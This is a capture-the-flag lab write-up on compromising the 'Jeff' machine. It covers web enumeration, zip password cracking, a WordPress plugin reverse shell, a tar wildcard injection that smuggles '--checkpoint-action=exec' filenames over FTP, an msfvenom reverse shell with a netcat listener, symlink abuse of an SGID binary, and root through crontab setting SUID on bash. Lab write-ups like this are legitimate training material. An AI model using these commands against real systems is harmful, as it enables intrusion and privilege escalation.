Writeup: Jeff CTF

1. Port Scanning

I started with a simple nmap TCP port scan, and by the ouput we can see that there’s nothing beyond the usual.

nmap tcp scan from jeff ctf
Only two ports are open, 22/tcp (running OpenSSH 7.6p1) and 80/tcp (running nginx).

2. Web Server Enumeration & Vhost Discovery

The webserver’s main page appears to be completely empty, but viewing it’s source code, we see a hint.

There's a hint at the webserver main page's source code! - Jeff CTF

Let’s add jeff.thm to our /etc/hosts

Adding Jeff.thm to /etc/hosts - Jeff CTF

We can now begin searching for valid subdomains and web server directories. To do so, gobuster fits our needs.

Running gobuster vhost mode with a DNS wordlist from seclists, we’re able to find a valid subdomain: wordpress.jeff.thm. Don’t forget to add it to your /etc/hosts file.

And running gobuster dir mode with the medium directory wordlist from dirbuster, we’re able to find 4 paths to follow: /uploads, /admin, /assets, /backups

There’s nothing interesting at jeff.thm main page, at /uploads there’s an upload form that does absolutely nothing, /admin is blank, /assets gives us a 403 (Forbidden), leaving us left with /backups.
I ran gobuster dir mode with the same wordlist, but updated the url value to http://jeff.thm/backups and added an option to include extensions at the end of each word. The extensions I added are common backup extensions like .tar, .zip, .rar, .7z and .bak. After a while, found a valid backup file: http://jeff.thm/backups/backup.zip

Using gobuster against /backups on Jeff CTF

3. Cracking Encrypted Backup File

We can download the backup file at /backups/backup.zip, but cannot unzip it because it’s encrypted.

Trying to unzip a backup file, but getting error as it's encrypted and needs a password - Jeff CTF

We can use JohnTheRipper and it’s scripts to try to crack the file. As it’s a zip file, we need to use zip2john.py to convert it to a format that john can understand and work with.

nmap tcp scan from jeff ctf

Valid password for the zip file (REDACTED).

Unzipping the backup, we can find a valid password for the wordpress user at wpadmin.bak

4. WordPress Exploitation & Initial Shell

Using the previously found password, we’re able to log in as “jeff ”at wordpress.jeff.thm/wp-login.php

After realizing that I won’t be able to upload a reverse shell by the usual ways, like editing a php file from the theme configuration, there is the solution that I managed to find -> Links: Source // Download
Go to plugins > add new > upload plugin > select the zip file, install and activate it

We could exploit this vulnerability manually, but there is a metasploit module that can do this for us automatically. Run msfconsole on your attacking machine, and follow the steps below.

5. Docker Container Breakout

We received a reverse shell connection, but sadly we’re in a docker container. We can confirm that by many means, but the most common is the presence of the file /.dockerenv.

We are logged in as “www-data”, the user responsible for the webserver. Checking /var/www/html folder, we find an interesting php file /var/www/html/ftp_backup.php

The script is uploading files to the ftp server on the host machine, and the host machine is doing something with these files. As it is a backup script, we can assume the host machine is compressing all files inside the directory to create a local backup. The correct path to follow is TAR wildcard exploitation.

1. Enumerating – FTP Server

[Victim machine]$ curl -s -v -P – ‘ftp://backupmgr:[email protected]

2. Exploiting – Tar

[Victim machine]$ echo ” > ‘–checkpoint-action=exec=sh shell.sh’
[Victim machine]$ echo ” > ‘–checkpoint=1’

P.S. Must be inside a writable folder, like /dev/shm

3. Exploiting – Shell generation

[Attacking machine]$ msfvenom -p cmd/unix/reverse_python lhost=YOUR-TUN0-IP lport=1234 R

Then, copy the output and save to ‘shell.sh’ on the victim machine, or use a python webserver and wget to transfer the file.

4. Uploading

[Victim machine]$ curl -T “–checkpoint-action=exec=sh shell.sh” -P – ‘ftp://backupmgr:[email protected]/files/’
[Victim machine]$ curl -T “–checkpoint=1” -P – ‘ftp://backupmgr:[email protected]/files/’
[Victim machine]$ curl -T shell.sh -P – ‘ftp://backupmgr:[email protected]/files/’
[Attacking machine]$ netcat -lvnp 1234

6. Horizontal Privilege Escalation

There are two users that have a home directory, jeff and backupmgr (us). Let’s search for files owned by jeff.

We can transfer /opt/systools/systool (owned by jeff, and only readable by him and users with the group “pwman”) to our machine and analyze further using reverse engineering tools. As this appears to be a simple ELF executable, let’s simply use the tool “strings”.

The script opens “message.txt” every time the option 2 is chose. This binary’s permissions are peculiar, there is a SGID bit set on it, and that mean we can run it with pwnman’s group permissions.

Unusual SGID bit set (/opt/systools/systool). On top of that, "pwman" group owns /var/backups/jeff.bak

[Victim machine]$ cd /opt/systools
[Victim machine]$ rm message.txt
[Victim machine]$ ln -s /var/backups/jeff.bak message.txt
[Victim machine]$ ./systool
Choose your option: 2

Doing so, we’re able to log in as jeff using his password running $su jeff
The user flag is not hashed. Run:
$ echo -n FLAG | md5sum

7. Vertical Privilege Escalation

As we have jeff’s password, le’ts see if he can run something as another user, perhaps root.

"jeff" can run crontab as root!

Seems like there are some restrictions in place and some commands are returning error. Let’s use python to circumvent this issue.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

There are many ways we can abuse crontab, but I chose to create a malicious python script inside /dev/shm, that will execute a system command (chmod +s /bin/bash), giving me the rights to run /bin/bash with root permissions.

It is a little bit unstable to use a text editor in this type of shell, so I used cat EOF.

[Victim Machine]$ sudo crontab -e
1. Scroll down to the bottom
2. Press: I
3. Paste this: * * * * * /usr/bin/python3 /dev/shm/script.py
4. Press: Esc, then : and type wq! to save and quit
5. Wait about 1 minute and run:
[Victim Machine]$ /bin/bash -p

 

Conclusion

Very cool machine, which covered a bunch of interesting topics. It took me a lot of time in order to complete the box, really testing my “tryhard” mentality. Overall, the Jeff CTF is a highly recommended room for anyone looking to improve their penetration testing skills in a fun and interactive way.

We hope that you have found our content useful and engaging, and we invite you to explore more of our website to discover other interesting topics that we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing you with the best possible user experience, and we welcome your feedback and suggestions via the contact form. Thank you for choosing our website, and we hope to see you again soon!

Scroll to Top